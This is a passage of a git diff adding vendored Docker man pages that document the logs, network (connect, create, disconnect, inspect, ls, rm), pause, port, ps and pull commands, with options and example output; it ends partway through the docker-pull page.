+[**--since**[=*SINCE*]] +[**-t**|**--timestamps**] +[**--tail**[=*"all"*]] +CONTAINER + +# DESCRIPTION +The **docker logs** command batch-retrieves whatever logs are present for +a container at the time of execution. This does not guarantee execution +order when combined with a docker run (i.e., your run may not have generated +any logs at the time you execute docker logs). + +The **docker logs --follow** command combines commands **docker logs** and +**docker attach**. It will first return all logs from the beginning and +then continue streaming new output from the container's stdout and stderr. + +**Warning**: This command works only for the **json-file** or **journald** +logging drivers. + +# OPTIONS +**--help** + Print usage statement + +**--details**=*true*|*false* + Show extra details provided to logs + +**-f**, **--follow**=*true*|*false* + Follow log output. The default is *false*. + +**--since**="" + Show logs since timestamp + +**-t**, **--timestamps**=*true*|*false* + Show timestamps. The default is *false*. + +**--tail**="*all*" + Output the specified number of lines at the end of logs (defaults to all logs) + +The `--since` option can be Unix timestamps, date formatted timestamps, or Go +duration strings (e.g. `10m`, `1h30m`) computed relative to the client machine's +time. Supported formats for date formatted time stamps include RFC3339Nano, +RFC3339, `2006-01-02T15:04:05`, `2006-01-02T15:04:05.999999999`, +`2006-01-02Z07:00`, and `2006-01-02`. The local timezone on the client will be +used if you do not provide either a `Z` or a `+-00:00` timezone offset at the +end of the timestamp. When providing Unix timestamps enter +seconds[.nanoseconds], where seconds is the number of seconds that have elapsed +since January 1, 1970 (midnight UTC/GMT), not counting leap seconds (aka Unix +epoch or Unix time), and the optional .nanoseconds field is a fraction of a +second no more than nine digits long. You can combine the `--since` option with +either or both of the `--follow` or `--tail` options. + +The `docker logs --details` command will add on extra attributes, such as +environment variables and labels, provided to `--log-opt` when creating the +container. + +# HISTORY +April 2014, Originally compiled by William Henry (whenry at redhat dot com) +based on docker.com source material and internal work. +June 2014, updated by Sven Dowideit +July 2014, updated by Sven Dowideit +April 2015, updated by Ahmet Alp Balkan +October 2015, updated by Mike Brown diff --git a/vendor/github.com/docker/docker/man/docker-network-connect.1.md b/vendor/github.com/docker/docker/man/docker-network-connect.1.md new file mode 100644 index 0000000000..096ec77a4d --- /dev/null +++ b/vendor/github.com/docker/docker/man/docker-network-connect.1.md @@ -0,0 +1,66 @@ +% DOCKER(1) Docker User Manuals +% Docker Community +% OCT 2015 +# NAME +docker-network-connect - connect a container to a network + +# SYNOPSIS +**docker network connect** +[**--help**] +NETWORK CONTAINER + +# DESCRIPTION + +Connects a container to a network. You can connect a container by name +or by ID. Once connected, the container can communicate with other containers in +the same network. + +```bash +$ docker network connect multi-host-network container1 +``` + +You can also use the `docker run --network=` option to start a container and immediately connect it to a network. + +```bash +$ docker run -itd --network=multi-host-network --ip 172.20.88.22 --ip6 2001:db8::8822 busybox +``` +You can pause, restart, and stop containers that are connected to a network. +A container connects to its configured networks when it runs. + +If specified, the container's IP address(es) is reapplied when a stopped +container is restarted. If the IP address is no longer available, the container +fails to start. One way to guarantee that the IP address is available is +to specify an `--ip-range` when creating the network, and choose the static IP +address(es) from outside that range. This ensures that the IP address is not +given to another container while this container is not on the network. + +```bash +$ docker network create --subnet 172.20.0.0/16 --ip-range 172.20.240.0/20 multi-host-network +``` + +```bash +$ docker network connect --ip 172.20.128.2 multi-host-network container2 +``` + +To verify the container is connected, use the `docker network inspect` command. Use `docker network disconnect` to remove a container from the network. + +Once connected in network, containers can communicate using only another +container's IP address or name. For `overlay` networks or custom plugins that +support multi-host connectivity, containers connected to the same multi-host +network but launched from different Engines can also communicate in this way. + +You can connect a container to one or more networks. The networks need not be the same type. For example, you can connect a single container bridge and overlay networks. + + +# OPTIONS +**NETWORK** + Specify network name + +**CONTAINER** + Specify container name + +**--help** + Print usage statement + +# HISTORY +OCT 2015, created by Mary Anthony diff --git a/vendor/github.com/docker/docker/man/docker-network-create.1.md b/vendor/github.com/docker/docker/man/docker-network-create.1.md new file mode 100644 index 0000000000..44ce8e15c2 --- /dev/null +++ b/vendor/github.com/docker/docker/man/docker-network-create.1.md @@ -0,0 +1,187 @@ +% DOCKER(1) Docker User Manuals +% Docker Community +% OCT 2015 +# NAME +docker-network-create - create a new network + +# SYNOPSIS +**docker network create** +[**--attachable**] +[**--aux-address**=*map[]*] +[**-d**|**--driver**=*DRIVER*] +[**--gateway**=*[]*] +[**--help**] +[**--internal**] +[**--ip-range**=*[]*] +[**--ipam-driver**=*default*] +[**--ipam-opt**=*map[]*] +[**--ipv6**] +[**--label**[=*[]*]] +[**-o**|**--opt**=*map[]*] +[**--subnet**=*[]*] +NETWORK-NAME + +# DESCRIPTION + +Creates a new network. The `DRIVER` accepts `bridge` or `overlay` which are the +built-in network drivers. If you have installed a third party or your own custom +network driver you can specify that `DRIVER` here also. If you don't specify the +`--driver` option, the command automatically creates a `bridge` network for you. +When you install Docker Engine it creates a `bridge` network automatically. This +network corresponds to the `docker0` bridge that Engine has traditionally relied +on. When launch a new container with `docker run` it automatically connects to +this bridge network. You cannot remove this default bridge network but you can +create new ones using the `network create` command. + +```bash +$ docker network create -d bridge my-bridge-network +``` + +Bridge networks are isolated networks on a single Engine installation. If you +want to create a network that spans multiple Docker hosts each running an +Engine, you must create an `overlay` network. Unlike `bridge` networks overlay +networks require some pre-existing conditions before you can create one. These +conditions are: + +* Access to a key-value store. Engine supports Consul, Etcd, and Zookeeper (Distributed store) key-value stores. +* A cluster of hosts with connectivity to the key-value store. +* A properly configured Engine `daemon` on each host in the cluster. + +The `dockerd` options that support the `overlay` network are: + +* `--cluster-store` +* `--cluster-store-opt` +* `--cluster-advertise` + +To read more about these options and how to configure them, see ["*Get started +with multi-host +network*"](https://docs.docker.com/engine/userguide/networking/get-started-overlay/). + +It is also a good idea, though not required, that you install Docker Swarm on to +manage the cluster that makes up your network. Swarm provides sophisticated +discovery and server management that can assist your implementation. + +Once you have prepared the `overlay` network prerequisites you simply choose a +Docker host in the cluster and issue the following to create the network: + +```bash +$ docker network create -d overlay my-multihost-network +``` + +Network names must be unique. The Docker daemon attempts to identify naming +conflicts but this is not guaranteed. It is the user's responsibility to avoid +name conflicts. + +## Connect containers + +When you start a container use the `--network` flag to connect it to a network. +This adds the `busybox` container to the `mynet` network. + +```bash +$ docker run -itd --network=mynet busybox +``` + +If you want to add a container to a network after the container is already +running use the `docker network connect` subcommand. + +You can connect multiple containers to the same network. Once connected, the +containers can communicate using only another container's IP address or name. +For `overlay` networks or custom plugins that support multi-host connectivity, +containers connected to the same multi-host network but launched from different +Engines can also communicate in this way. + +You can disconnect a container from a network using the `docker network +disconnect` command. + +## Specifying advanced options + +When you create a network, Engine creates a non-overlapping subnetwork for the +network by default. This subnetwork is not a subdivision of an existing network. +It is purely for ip-addressing purposes. You can override this default and +specify subnetwork values directly using the `--subnet` option. On a +`bridge` network you can only create a single subnet: + +```bash +$ docker network create -d bridge --subnet=192.168.0.0/16 br0 +``` + +Additionally, you also specify the `--gateway` `--ip-range` and `--aux-address` +options. + +```bash +$ docker network create \ + --driver=bridge \ + --subnet=172.28.0.0/16 \ + --ip-range=172.28.5.0/24 \ + --gateway=172.28.5.254 \ + br0 +``` + +If you omit the `--gateway` flag the Engine selects one for you from inside a +preferred pool. For `overlay` networks and for network driver plugins that +support it you can create multiple subnetworks. + +```bash +$ docker network create -d overlay \ + --subnet=192.168.0.0/16 \ + --subnet=192.170.0.0/16 \ + --gateway=192.168.0.100 \ + --gateway=192.170.0.100 \ + --ip-range=192.168.1.0/24 \ + --aux-address="my-router=192.168.1.5" --aux-address="my-switch=192.168.1.6" \ + --aux-address="my-printer=192.170.1.5" --aux-address="my-nas=192.170.1.6" \ + my-multihost-network +``` + +Be sure that your subnetworks do not overlap. If they do, the network create +fails and Engine returns an error. + +### Network internal mode + +By default, when you connect a container to an `overlay` network, Docker also +connects a bridge network to it to provide external connectivity. If you want +to create an externally isolated `overlay` network, you can specify the +`--internal` option. + +# OPTIONS +**--attachable** + Enable manual container attachment + +**--aux-address**=map[] + Auxiliary IPv4 or IPv6 addresses used by network driver + +**-d**, **--driver**=*DRIVER* + Driver to manage the Network bridge or overlay. The default is bridge. + +**--gateway**=[] + IPv4 or IPv6 Gateway for the master subnet + +**--help** + Print usage + +**--internal** + Restrict external access to the network + +**--ip-range**=[] + Allocate container ip from a sub-range + +**--ipam-driver**=*default* + IP Address Management Driver + +**--ipam-opt**=map[] + Set custom IPAM driver options + +**--ipv6** + Enable IPv6 networking + +**--label**=*label* + Set metadata for a network + +**-o**, **--opt**=map[] + Set custom driver options + +**--subnet**=[] + Subnet in CIDR format that represents a network segment + +# HISTORY +OCT 2015, created by Mary Anthony diff --git a/vendor/github.com/docker/docker/man/docker-network-disconnect.1.md b/vendor/github.com/docker/docker/man/docker-network-disconnect.1.md new file mode 100644 index 0000000000..09bcac51b0 --- /dev/null +++ b/vendor/github.com/docker/docker/man/docker-network-disconnect.1.md @@ -0,0 +1,36 @@ +% DOCKER(1) Docker User Manuals +% Docker Community +% OCT 2015 +# NAME +docker-network-disconnect - disconnect a container from a network + +# SYNOPSIS +**docker network disconnect** +[**--help**] +[**--force**] +NETWORK CONTAINER + +# DESCRIPTION + +Disconnects a container from a network. + +```bash + $ docker network disconnect multi-host-network container1 +``` + + +# OPTIONS +**NETWORK** + Specify network name + +**CONTAINER** + Specify container name + +**--force** + Force the container to disconnect from a network + +**--help** + Print usage statement + +# HISTORY +OCT 2015, created by Mary Anthony diff --git a/vendor/github.com/docker/docker/man/docker-network-inspect.1.md b/vendor/github.com/docker/docker/man/docker-network-inspect.1.md new file mode 100644 index 0000000000..f27c98cb34 --- /dev/null +++ b/vendor/github.com/docker/docker/man/docker-network-inspect.1.md @@ -0,0 +1,112 @@ +% DOCKER(1) Docker User Manuals +% Docker Community +% OCT 2015 +# NAME +docker-network-inspect - inspect a network + +# SYNOPSIS +**docker network inspect** +[**-f**|**--format**[=*FORMAT*]] +[**--help**] +NETWORK [NETWORK...] + +# DESCRIPTION + +Returns information about one or more networks. By default, this command renders all results in a JSON object. For example, if you connect two containers to the default `bridge` network: + +```bash +$ sudo docker run -itd --name=container1 busybox +f2870c98fd504370fb86e59f32cd0753b1ac9b69b7d80566ffc7192a82b3ed27 + +$ sudo docker run -itd --name=container2 busybox +bda12f8922785d1f160be70736f26c1e331ab8aaf8ed8d56728508f2e2fd4727 +``` + +The `network inspect` command shows the containers, by id, in its +results. You can specify an alternate format to execute a given +template for each result. Go's +[text/template](http://golang.org/pkg/text/template/) package +describes all the details of the format. + +```bash +$ sudo docker network inspect bridge +[ + { + "Name": "bridge", + "Id": "b2b1a2cba717161d984383fd68218cf70bbbd17d328496885f7c921333228b0f", + "Scope": "local", + "Driver": "bridge", + "IPAM": { + "Driver": "default", + "Config": [ + { + "Subnet": "172.17.42.1/16", + "Gateway": "172.17.42.1" + } + ] + }, + "Internal": false, + "Containers": { + "bda12f8922785d1f160be70736f26c1e331ab8aaf8ed8d56728508f2e2fd4727": { + "Name": "container2", + "EndpointID": "0aebb8fcd2b282abe1365979536f21ee4ceaf3ed56177c628eae9f706e00e019", + "MacAddress": "02:42:ac:11:00:02", + "IPv4Address": "172.17.0.2/16", + "IPv6Address": "" + }, + "f2870c98fd504370fb86e59f32cd0753b1ac9b69b7d80566ffc7192a82b3ed27": { + "Name": "container1", + "EndpointID": "a00676d9c91a96bbe5bcfb34f705387a33d7cc365bac1a29e4e9728df92d10ad", + "MacAddress": "02:42:ac:11:00:01", + "IPv4Address": "172.17.0.1/16", + "IPv6Address": "" + } + }, + "Options": { + "com.docker.network.bridge.default_bridge": "true", + "com.docker.network.bridge.enable_icc": "true", + "com.docker.network.bridge.enable_ip_masquerade": "true", + "com.docker.network.bridge.host_binding_ipv4": "0.0.0.0", + "com.docker.network.bridge.name": "docker0", + "com.docker.network.driver.mtu": "1500" + } + } +] +``` + +Returns the information about the user-defined network: + +```bash +$ docker network create simple-network +69568e6336d8c96bbf57869030919f7c69524f71183b44d80948bd3927c87f6a +$ docker network inspect simple-network +[ + { + "Name": "simple-network", + "Id": "69568e6336d8c96bbf57869030919f7c69524f71183b44d80948bd3927c87f6a", + "Scope": "local", + "Driver": "bridge", + "IPAM": { + "Driver": "default", + "Config": [ + { + "Subnet": "172.22.0.0/16", + "Gateway": "172.22.0.1" + } + ] + }, + "Containers": {}, + "Options": {} + } +] +``` + +# OPTIONS +**-f**, **--format**="" + Format the output using the given Go template. + +**--help** + Print usage statement + +# HISTORY +OCT 2015, created by Mary Anthony diff --git a/vendor/github.com/docker/docker/man/docker-network-ls.1.md b/vendor/github.com/docker/docker/man/docker-network-ls.1.md new file mode 100644 index 0000000000..f319e66035 --- /dev/null +++ b/vendor/github.com/docker/docker/man/docker-network-ls.1.md @@ -0,0 +1,188 @@ +% DOCKER(1) Docker User Manuals +% Docker Community +% OCT 2015 +# NAME +docker-network-ls - list networks + +# SYNOPSIS +**docker network ls** +[**-f**|**--filter**[=*[]*]] +[**--format**=*"TEMPLATE"*] +[**--no-trunc**[=*true*|*false*]] +[**-q**|**--quiet**[=*true*|*false*]] +[**--help**] + +# DESCRIPTION + +Lists all the networks the Engine `daemon` knows about. This includes the +networks that span across multiple hosts in a cluster, for example: + +```bash + $ docker network ls + NETWORK ID NAME DRIVER SCOPE + 7fca4eb8c647 bridge bridge local + 9f904ee27bf5 none null local + cf03ee007fb4 host host local + 78b03ee04fc4 multi-host overlay swarm +``` + +Use the `--no-trunc` option to display the full network id: + +```bash +$ docker network ls --no-trunc +NETWORK ID NAME DRIVER +18a2866682b85619a026c81b98a5e375bd33e1b0936a26cc497c283d27bae9b3 none null +c288470c46f6c8949c5f7e5099b5b7947b07eabe8d9a27d79a9cbf111adcbf47 host host +7b369448dccbf865d397c8d2be0cda7cf7edc6b0945f77d2529912ae917a0185 bridge bridge +95e74588f40db048e86320c6526440c504650a1ff3e9f7d60a497c4d2163e5bd foo bridge +63d1ff1f77b07ca51070a8c227e962238358bd310bde1529cf62e6c307ade161 dev bridge +``` + +## Filtering + +The filtering flag (`-f` or `--filter`) format is a `key=value` pair. If there +is more than one filter, then pass multiple flags (e.g. `--filter "foo=bar" --filter "bif=baz"`). +Multiple filter flags are combined as an `OR` filter. For example, +`-f type=custom -f type=builtin` returns both `custom` and `builtin` networks. + +The currently supported filters are: + +* driver +* id (network's id) +* label (`label=` or `label==`) +* name (network's name) +* type (custom|builtin) + +#### Driver + +The `driver` filter matches networks based on their driver. + +The following example matches networks with the `bridge` driver: + +```bash +$ docker network ls --filter driver=bridge +NETWORK ID NAME DRIVER +db9db329f835 test1 bridge +f6e212da9dfd test2 bridge +``` + +#### ID + +The `id` filter matches on all or part of a network's ID. + +The following filter matches all networks with an ID containing the +`63d1ff1f77b0...` string. + +```bash +$ docker network ls --filter id=63d1ff1f77b07ca51070a8c227e962238358bd310bde1529cf62e6c307ade161 +NETWORK ID NAME DRIVER +63d1ff1f77b0 dev bridge +``` + +You can also filter for a substring in an ID as this shows: + +```bash +$ docker network ls --filter id=95e74588f40d +NETWORK ID NAME DRIVER +95e74588f40d foo bridge + +$ docker network ls --filter id=95e +NETWORK ID NAME DRIVER +95e74588f40d foo bridge +``` + +#### Label + +The `label` filter matches networks based on the presence of a `label` alone or a `label` and a +value. + +The following filter matches networks with the `usage` label regardless of its value. + +```bash +$ docker network ls -f "label=usage" +NETWORK ID NAME DRIVER +db9db329f835 test1 bridge +f6e212da9dfd test2 bridge +``` + +The following filter matches networks with the `usage` label with the `prod` value. + +```bash +$ docker network ls -f "label=usage=prod" +NETWORK ID NAME DRIVER +f6e212da9dfd test2 bridge +``` + +#### Name + +The `name` filter matches on all or part of a network's name. + +The following filter matches all networks with a name containing the `foobar` string. + +```bash +$ docker network ls --filter name=foobar +NETWORK ID NAME DRIVER +06e7eef0a170 foobar bridge +``` + +You can also filter for a substring in a name as this shows: + +```bash +$ docker network ls --filter name=foo +NETWORK ID NAME DRIVER +95e74588f40d foo bridge +06e7eef0a170 foobar bridge +``` + +#### Type + +The `type` filter supports two values; `builtin` displays predefined networks +(`bridge`, `none`, `host`), whereas `custom` displays user defined networks. + +The following filter matches all user defined networks: + +```bash +$ docker network ls --filter type=custom +NETWORK ID NAME DRIVER +95e74588f40d foo bridge +63d1ff1f77b0 dev bridge +``` + +By having this flag it allows for batch cleanup. For example, use this filter +to delete all user defined networks: + +```bash +$ docker network rm `docker network ls --filter type=custom -q` +``` + +A warning will be issued when trying to remove a network that has containers +attached. + +# OPTIONS + +**-f**, **--filter**=*[]* + filter output based on conditions provided. + +**--format**="*TEMPLATE*" + Pretty-print networks using a Go template. + Valid placeholders: + .ID - Network ID + .Name - Network name + .Driver - Network driver + .Scope - Network scope (local, global) + .IPv6 - Whether IPv6 is enabled on the network or not + .Internal - Whether the network is internal or not + .Labels - All labels assigned to the network + .Label - Value of a specific label for this network. For example `{{.Label "project.version"}}` + +**--no-trunc**=*true*|*false* + Do not truncate the output + +**-q**, **--quiet**=*true*|*false* + Only display network IDs + +**--help** + Print usage statement + +# HISTORY +OCT 2015, created by Mary Anthony diff --git a/vendor/github.com/docker/docker/man/docker-network-rm.1.md b/vendor/github.com/docker/docker/man/docker-network-rm.1.md new file mode 100644 index 0000000000..c094a15286 --- /dev/null +++ b/vendor/github.com/docker/docker/man/docker-network-rm.1.md @@ -0,0 +1,43 @@ +% DOCKER(1) Docker User Manuals +% Docker Community +% OCT 2015 +# NAME +docker-network-rm - remove one or more networks + +# SYNOPSIS +**docker network rm** +[**--help**] +NETWORK [NETWORK...] + +# DESCRIPTION + +Removes one or more networks by name or identifier. To remove a network, +you must first disconnect any containers connected to it. +To remove the network named 'my-network': + +```bash + $ docker network rm my-network +``` + +To delete multiple networks in a single `docker network rm` command, provide +multiple network names or ids. The following example deletes a network with id +`3695c422697f` and a network named `my-network`: + +```bash + $ docker network rm 3695c422697f my-network +``` + +When you specify multiple networks, the command attempts to delete each in turn. +If the deletion of one network fails, the command continues to the next on the +list and tries to delete that. The command reports success or failure for each +deletion. + +# OPTIONS +**NETWORK** + Specify network name or id + +**--help** + Print usage statement + +# HISTORY +OCT 2015, created by Mary Anthony diff --git a/vendor/github.com/docker/docker/man/docker-pause.1.md b/vendor/github.com/docker/docker/man/docker-pause.1.md new file mode 100644 index 0000000000..11eef5321f --- /dev/null +++ b/vendor/github.com/docker/docker/man/docker-pause.1.md @@ -0,0 +1,32 @@ +% DOCKER(1) Docker User Manuals +% Docker Community +% JUNE 2014 +# NAME +docker-pause - Pause all processes within one or more containers + +# SYNOPSIS +**docker pause** +CONTAINER [CONTAINER...] + +# DESCRIPTION + +The `docker pause` command suspends all processes in the specified containers. +On Linux, this uses the cgroups freezer. Traditionally, when suspending a process +the `SIGSTOP` signal is used, which is observable by the process being suspended. +With the cgroups freezer the process is unaware, and unable to capture, +that it is being suspended, and subsequently resumed. On Windows, only Hyper-V +containers can be paused. + +See the [cgroups freezer documentation] +(https://www.kernel.org/doc/Documentation/cgroup-v1/freezer-subsystem.txt) for +further details. + +# OPTIONS +**--help** + Print usage statement + +# See also +**docker-unpause(1)** to unpause all processes within one or more containers. + +# HISTORY +June 2014, updated by Sven Dowideit diff --git a/vendor/github.com/docker/docker/man/docker-port.1.md b/vendor/github.com/docker/docker/man/docker-port.1.md new file mode 100644 index 0000000000..83e9cf93b6 --- /dev/null +++ b/vendor/github.com/docker/docker/man/docker-port.1.md @@ -0,0 +1,47 @@ +% DOCKER(1) Docker User Manuals +% Docker Community +% JUNE 2014 +# NAME +docker-port - List port mappings for the CONTAINER, or lookup the public-facing port that is NAT-ed to the PRIVATE_PORT + +# SYNOPSIS +**docker port** +[**--help**] +CONTAINER [PRIVATE_PORT[/PROTO]] + +# DESCRIPTION +List port mappings for the CONTAINER, or lookup the public-facing port that is NAT-ed to the PRIVATE_PORT + +# OPTIONS +**--help** + Print usage statement + +# EXAMPLES + + # docker ps + CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES + b650456536c7 busybox:latest top 54 minutes ago Up 54 minutes 0.0.0.0:1234->9876/tcp, 0.0.0.0:4321->7890/tcp test + +## Find out all the ports mapped + + # docker port test + 7890/tcp -> 0.0.0.0:4321 + 9876/tcp -> 0.0.0.0:1234 + +## Find out a specific mapping + + # docker port test 7890/tcp + 0.0.0.0:4321 + + # docker port test 7890 + 0.0.0.0:4321 + +## An example showing error for non-existent mapping + + # docker port test 7890/udp + 2014/06/24 11:53:36 Error: No public port '7890/udp' published for test + +# HISTORY +April 2014, Originally compiled by William Henry (whenry at redhat dot com) +June 2014, updated by Sven Dowideit +November 2014, updated by Sven Dowideit diff --git a/vendor/github.com/docker/docker/man/docker-ps.1.md b/vendor/github.com/docker/docker/man/docker-ps.1.md new file mode 100644 index 0000000000..d9aa39f8fd --- /dev/null +++ b/vendor/github.com/docker/docker/man/docker-ps.1.md @@ -0,0 +1,145 @@ +% DOCKER(1) Docker User Manuals +% Docker Community +% FEBRUARY 2015 +# NAME +docker-ps - List containers + +# SYNOPSIS +**docker ps** +[**-a**|**--all**] +[**-f**|**--filter**[=*[]*]] +[**--format**=*"TEMPLATE"*] +[**--help**] +[**-l**|**--latest**] +[**-n**[=*-1*]] +[**--no-trunc**] +[**-q**|**--quiet**] +[**-s**|**--size**] + +# DESCRIPTION + +List the containers in the local repository. By default this shows only +the running containers. + +# OPTIONS +**-a**, **--all**=*true*|*false* + Show all containers. Only running containers are shown by default. The default is *false*. + +**-f**, **--filter**=[] + Filter output based on these conditions: + - exited= an exit code of + - label= or label== + - status=(created|restarting|running|paused|exited|dead) + - name= a container's name + - id= a container's ID + - is-task=(true|false) - containers that are a task (part of a service managed by swarm) + - before=(|) + - since=(|) + - ancestor=([:tag]||) - containers created from an image or a descendant. + - volume=(|) + - network=(|) - containers connected to the provided network + - health=(starting|healthy|unhealthy|none) - filters containers based on healthcheck status + +**--format**="*TEMPLATE*" + Pretty-print containers using a Go template. + Valid placeholders: + .ID - Container ID + .Image - Image ID + .Command - Quoted command + .CreatedAt - Time when the container was created. + .RunningFor - Elapsed time since the container was started. + .Ports - Exposed ports. + .Status - Container status. + .Size - Container disk size. + .Names - Container names. + .Labels - All labels assigned to the container. + .Label - Value of a specific label for this container. For example `{{.Label "com.docker.swarm.cpu"}}` + .Mounts - Names of the volumes mounted in this container. + +**--help** + Print usage statement + +**-l**, **--latest**=*true*|*false* + Show only the latest created container (includes all states). The default is *false*. + +**-n**=*-1* + Show n last created containers (includes all states). + +**--no-trunc**=*true*|*false* + Don't truncate output. The default is *false*. + +**-q**, **--quiet**=*true*|*false* + Only display numeric IDs. The default is *false*. + +**-s**, **--size**=*true*|*false* + Display total file sizes. The default is *false*. + +# EXAMPLES +# Display all containers, including non-running + + # docker ps -a + CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES + a87ecb4f327c fedora:20 /bin/sh -c #(nop) MA 20 minutes ago Exit 0 desperate_brattain + 01946d9d34d8 vpavlin/rhel7:latest /bin/sh -c #(nop) MA 33 minutes ago Exit 0 thirsty_bell + c1d3b0166030 acffc0358b9e /bin/sh -c yum -y up 2 weeks ago Exit 1 determined_torvalds + 41d50ecd2f57 fedora:20 /bin/sh -c #(nop) MA 2 weeks ago Exit 0 drunk_pike + +# Display only IDs of all containers, including non-running + + # docker ps -a -q + a87ecb4f327c + 01946d9d34d8 + c1d3b0166030 + 41d50ecd2f57 + +# Display only IDs of all containers that have the name `determined_torvalds` + + # docker ps -a -q --filter=name=determined_torvalds + c1d3b0166030 + +# Display containers with their commands + + # docker ps --format "{{.ID}}: {{.Command}}" + a87ecb4f327c: /bin/sh -c #(nop) MA + 01946d9d34d8: /bin/sh -c #(nop) MA + c1d3b0166030: /bin/sh -c yum -y up + 41d50ecd2f57: /bin/sh -c #(nop) MA + +# Display containers with their labels in a table + + # docker ps --format "table {{.ID}}\t{{.Labels}}" + CONTAINER ID LABELS + a87ecb4f327c com.docker.swarm.node=ubuntu,com.docker.swarm.storage=ssd + 01946d9d34d8 + c1d3b0166030 com.docker.swarm.node=debian,com.docker.swarm.cpu=6 + 41d50ecd2f57 com.docker.swarm.node=fedora,com.docker.swarm.cpu=3,com.docker.swarm.storage=ssd + +# Display containers with their node label in a table + + # docker ps --format 'table {{.ID}}\t{{(.Label "com.docker.swarm.node")}}' + CONTAINER ID NODE + a87ecb4f327c ubuntu + 01946d9d34d8 + c1d3b0166030 debian + 41d50ecd2f57 fedora + +# Display containers with `remote-volume` mounted + + $ docker ps --filter volume=remote-volume --format "table {{.ID}}\t{{.Mounts}}" + CONTAINER ID MOUNTS + 9c3527ed70ce remote-volume + +# Display containers with a volume mounted in `/data` + + $ docker ps --filter volume=/data --format "table {{.ID}}\t{{.Mounts}}" + CONTAINER ID MOUNTS + 9c3527ed70ce remote-volume + +# HISTORY +April 2014, Originally compiled by William Henry (whenry at redhat dot com) +based on docker.com source material and internal work. +June 2014, updated by Sven Dowideit +August 2014, updated by Sven Dowideit +November 2014, updated by Sven Dowideit +February 2015, updated by André Martins +October 2016, updated by Josh Horwitz diff --git a/vendor/github.com/docker/docker/man/docker-pull.1.md b/vendor/github.com/docker/docker/man/docker-pull.1.md new file mode 100644 index 0000000000..c61d005308 --- /dev/null +++ b/vendor/github.com/docker/docker/man/docker-pull.1.md @@ -0,0 +1,220 @@ +% DOCKER(1) Docker User Manuals +% Docker Community +% JUNE 2014 +# NAME +docker-pull - Pull an image or a repository from a registry + +# SYNOPSIS +**docker pull** +[**-a**|**--all-tags**] +[**--help**] +NAME[:TAG] | [REGISTRY_HOST[:REGISTRY_PORT]/]NAME[:TAG] + +# DESCRIPTION + +This command pulls down an image or a repository from a registry. If +there is more than one image for a repository (e.g., fedora) then all +images for that repository name can be pulled down including any tags +(see the option **-a** or **--all-tags**). + +If you do not specify a `REGISTRY_HOST`, the command uses Docker's public +registry located at `registry-1.docker.io` by default. + +# OPTIONS +**-a**, **--all-tags**=*true*|*false* + Download all tagged images in the repository. The default is *false*. + +**--help** + Print usage statement + +# EXAMPLES + +### Pull an image from Docker Hub + +To download a particular image, or set of images (i.e., a repository), use +`docker pull`. If no tag is provided, Docker Engine uses the `:latest` tag as a +default. This command pulls the `debian:latest` image: + + $ docker pull debian + + Using default tag: latest + latest: Pulling from library/debian + fdd5d7827f33: Pull complete + a3ed95caeb02: Pull complete + Digest: sha256:e7d38b3517548a1c71e41bffe9c8ae6d6d29546ce46bf62159837aad072c90aa + Status: Downloaded newer image for debian:latest + +Docker images can consist of multiple layers. In the example above, the image +consists of two layers; `fdd5d7827f33` and `a3ed95caeb02`. + +Layers can be reused by images. For example, the `debian:jessie` image shares +both layers with `debian:latest`. Pulling the `debian:jessie` image therefore +only pulls its metadata, but not its layers, because all layers are already +present locally: + + $ docker pull debian:jessie + + jessie: Pulling from library/debian + fdd5d7827f33: Already exists + a3ed95caeb02: Already exists + Digest: sha256:a9c958be96d7d40df920e7041608f2f017af81800ca5ad23e327bc402626b58e + Status: Downloaded newer image for debian:jessie + +To see which images are present locally, use the **docker-images(1)** +command: + + $ docker images + + REPOSITORY TAG IMAGE ID CREATED SIZE + debian jessie f50f9524513f 5 days ago 125.1 MB + debian latest f50f9524513f 5 days ago 125.1 MB + +Docker uses a content-addressable image store, and the image ID is a SHA256 +digest covering the image's configuration and layers. In the example above, +`debian:jessie` and `debian:latest` have the same image ID because they are +actually the *same* image tagged with different names. Because they are the +same image, their layers are stored only once and do not consume extra disk +space. + +For more information about images, layers, and the content-addressable store, +refer to [understand images, containers, and storage drivers](https://docs.docker.com/engine/userguide/storagedriver/imagesandcontainers/) +in the online documentation. + + +## Pull an image by digest (immutable identifier) + +So far, you've pulled images by their name (and "tag"). Using names and tags is +a convenient way to work with images. When using tags, you can `docker pull` an +image again to make sure you have the most up-to-date version of that image. +For example, `docker pull ubuntu:14.04` pulls the latest version of the Ubuntu +14.04 image. + +In some cases you don't want images to be updated to newer versions, but prefer +to use a fixed version of an image. Docker enables you to pull an image by its +*digest*. When pulling an image by digest, you specify *exactly* which version +of an image to pull. Doing so, allows you to "pin" an image to that version, +and guarantee that the image you're using is always the same. + +To know the digest of an image, pull the image first. Let's pull the latest +`ubuntu:14.04` image from Docker Hub: + + $ docker pull ubuntu:14.04 + + 14.04: Pulling from library/ubuntu + 5a132a7e7af1: Pull complete + fd2731e4c50c: Pull complete + 28a2f68d1120: Pull complete + a3ed95caeb02: Pull complete + Digest: sha256:45b23dee08af5e43a7fea6c4cf9c25ccf269ee113168c19722f87876677c5cb2 + Status: Downloaded newer image for ubuntu:14.04 + +Docker prints the digest of the image after the pull has finished. In the example +above, the digest of the image is: + + sha256:45b23dee08af5e43a7fea6c4cf9c25ccf269ee113168c19722f87876677c5cb2 + +Docker also prints the digest of an image when *pushing* to a registry. This +may be useful if you want to pin to a version of the image you just pushed. + +A digest takes the place of the tag when pulling an image, for example, to +pull the above image by digest, run the following command: + + $ docker pull ubuntu@sha256:45b23dee08af5e43a7fea6c4cf9c25ccf269ee113168c19722f87876677c5cb2 + + sha256:45b23dee08af5e43a7fea6c4cf9c25ccf269ee113168c19722f87876677c5cb2: Pulling from library/ubuntu + 5a132a7e7af1: Already exists + fd2731e4c50c: Already exists + 28a2f68d1120: Already exists + a3ed95caeb02: Already exists + Digest: sha256:45b23dee08af5e43a7fea6c4cf9c25ccf269ee113168c19722f87876677c5cb2 + Status: Downloaded newer image for ubuntu@sha256:45b23dee08af5e43a7fea6c4cf9c25ccf269ee113168c19722f87876677c5cb2 + +Digest can also be used in the `FROM` of a Dockerfile, for example: + + FROM ubuntu@sha256:45b23dee08af5e43a7fea6c4cf9c25ccf269ee113168c19722f87876677c5cb2 + MAINTAINER some maintainer + +> **Note**: Using this feature "pins" an image to a specific version in time. +> Docker will therefore not pull updated versions of an image, which may include +> security updates. If you want to pull an updated image, you need to change the +> digest accordingly. + +## Pulling from a different registry + +By default, `docker pull` pulls images from Docker Hub. It is also possible to +manually specify the path of a registry 